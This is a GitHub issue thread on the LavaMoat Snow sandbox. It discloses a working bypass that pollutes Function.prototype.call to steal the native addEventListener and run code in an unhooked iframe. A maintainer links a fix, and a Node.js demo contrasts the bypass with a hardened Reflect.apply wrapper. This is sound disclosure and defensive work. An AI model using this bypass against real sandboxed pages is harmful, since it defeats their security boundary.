LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass with Function.prototype.call pollution #114

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago
// Pollute Function.prototype.call so that every `.call` made through the
// prototype passes through us first. Snow registers its listener on new
// iframes by `.call`ing its saved native addEventListener, so the native
// shows up here as `this`.
var _call = Function.prototype.call;
var _addEventListener; // will hold the stolen native addEventListener
Function.prototype.call = function() {
    var args = Array.from(arguments);
    // args[0] is the target, args[1] the event type, args[2] the listener;
    // the null check avoids throwing on `.call` invocations with fewer arguments.
    if (args[2] != null && args[2].toString().includes('hook')) {
        _addEventListener = this; // steal ref to the native being .call()ed
        return; // and swallow Snow's hook registration
    }
    return _call.apply(this, args);
};
// Trigger Snow's iframe handling once so that it runs through the polluted call.
var f = document.createElement('iframe');
document.body.appendChild(f);
// Use the stolen native via the still-clean .apply to attach a load listener
// to a fresh iframe that Snow never gets to hook.
var f2 = document.createElement('iframe');
_addEventListener.apply(f2, ['load', function() {
    this.contentWindow.alert(1);
}]);
document.body.appendChild(f2);
weizman commented 1 year ago

Amazing as usual! EventTarget is the only native I was not able to bring from a detached iframe (because of https://github.com/LavaMoat/snow/issues/61), so nice catch! Thoughts on a simple fix? https://github.com/LavaMoat/snow/pull/115

mmndaniel commented 1 year ago

LGTM!
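The pattern behind the bypass above, as an added example that is not Snow's code and not the fix from #115: a wrapper that invokes a saved native through `.call` resolves `Function.prototype.call` at call time, so whoever polluted it sees the native as `this`; a wrapper that captured `Reflect.apply` at load time, before any untrusted code ran, never consults the prototype again. The example runs in plain Node.js, so `makeNative` is a constructed stand-in for a native `addEventListener`, and `makeVulnerableWrapper`, `makeHardenedWrapper`, `pollute` and `runScenario` are names chosen for this illustration only.

```javascript
// Added example (not Snow's code). Constructed stand-in for a native
// addEventListener: records listeners per target so we can inspect them.
function makeNative() {
  const listeners = new Map();
  function addEventListener(type, listener) {
    if (!listeners.has(this)) listeners.set(this, []);
    listeners.get(this).push({ type, listener });
  }
  return { addEventListener, listeners };
}

// Vulnerable wrapper: invokes the saved native via `.call`, which is looked
// up on Function.prototype at call time and can therefore be replaced.
function makeVulnerableWrapper(native) {
  return function addEventListener(type, listener) {
    // named function expression so its source text contains "hook"
    const hook = function hook(ev) { return listener.call(this, ev); };
    return native.call(this, type, hook);
  };
}

// Hardened wrapper: captures Reflect.apply once at load time (before any
// attacker code runs) and never goes through Function.prototype.call.
function makeHardenedWrapper(native) {
  const apply = Reflect.apply;
  return function addEventListener(type, listener) {
    const hook = function hook(ev) { return apply(listener, this, [ev]); };
    return apply(native, this, [type, hook]);
  };
}

// Attacker step from the issue: replace Function.prototype.call and keep the
// `this` (the raw native) of any call whose listener argument mentions "hook".
function pollute() {
  const realCall = Function.prototype.call;
  const stolen = { native: null };
  Function.prototype.call = function () {
    const args = Array.from(arguments);
    if (args[2] != null && String(args[2]).includes('hook')) {
      stolen.native = this;   // steal the native reference
      return;                 // swallow the wrapper's registration
    }
    return realCall.apply(this, args);
  };
  return { stolen, restore() { Function.prototype.call = realCall; } };
}

// Library loads first, attacker pollutes afterwards, then a page registers a
// listener through the wrapper and the attacker tries the stolen native on a
// second target the wrapper never saw.
function runScenario(makeWrapper) {
  const native = makeNative();
  const wrapper = makeWrapper(native.addEventListener);
  const { stolen, restore } = pollute();
  try {
    const page = { addEventListener: wrapper };
    page.addEventListener('load', function onLoad() {});

    const other = {};
    if (stolen.native) {
      // same move as `_addEventListener.apply(f2, ...)` in the issue
      stolen.native.apply(other, ['load', function evil() {}]);
    }
    return {
      leaked: stolen.native === native.addEventListener,
      registered: (native.listeners.get(page) || []).length,
      bypassed: (native.listeners.get(other) || []).length,
    };
  } finally {
    restore();
  }
}

console.log('vulnerable wrapper:', runScenario(makeVulnerableWrapper));
console.log('hardened wrapper:  ', runScenario(makeHardenedWrapper));
```

The vulnerable run leaks the native, drops the page's own registration (the polluted `call` returns early) and lets the attacker register an unhooked listener on `other`; the hardened run registers the hooked listener and leaks nothing. The caveat is ordering: capturing `Reflect.apply` (or any native) only helps if the wrapper's setup genuinely runs before untrusted code, which is the threat model Snow relies on.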